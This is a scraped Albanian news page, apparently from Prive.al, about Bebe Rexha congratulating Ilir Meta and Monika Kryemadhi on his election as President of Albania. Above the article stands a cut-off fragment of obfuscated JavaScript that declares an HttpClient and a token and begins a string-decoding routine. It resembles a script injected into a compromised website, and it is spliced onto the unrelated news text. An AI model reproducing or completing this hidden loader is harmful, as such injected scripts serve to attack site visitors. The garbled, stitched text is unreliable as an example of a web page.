;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Ylli botëror uron Presidentin e ri të Shqipërisë

By

Ilir Meta edhe zyrtarisht është Presidenti i ri i Shqipërisë që do të pasojë në mandatin pesë vjeçar Bujar Nishanin pak muaj më pas kur edhe do të marrë solemnisht detyrën.

Siç edhe e do rendi dhe rregullat protokolare, në adresë të Metës nga e gjithë bota kanë nisur të arrijnë telegrame urimesh.

Por, Presidenti i ri i Shqipërisë ka dalë përtej kondiktave duke pranuar urime jo vetëm nga liderë shtetesh e akterë të tjerë të lidhur me politikën!

Përmes rrjeteve sociale, ka qenë një yll botëror i muzikës që ka uruar atë dhe bashkëshorten, njëherësh zonjën e parë të Shqipërisë.

Fjala është për Bebe Rexhën e cila në Snapchat ka postuar një fotografi të çiftit presidencial nën mbishkrimin: ‘Urime Ilir dhe Monika’.

Ndryshe, Bebe thuhet që ka lidhje familjare me gruan e Metës, Monika Kryemadhin teksa paraprakisht është parë edhe e shoqëruar nga vajza e vogël e çiftit, Era, nëpër koncerte të saj. /Prive.al/

Artikuj të ngjashëm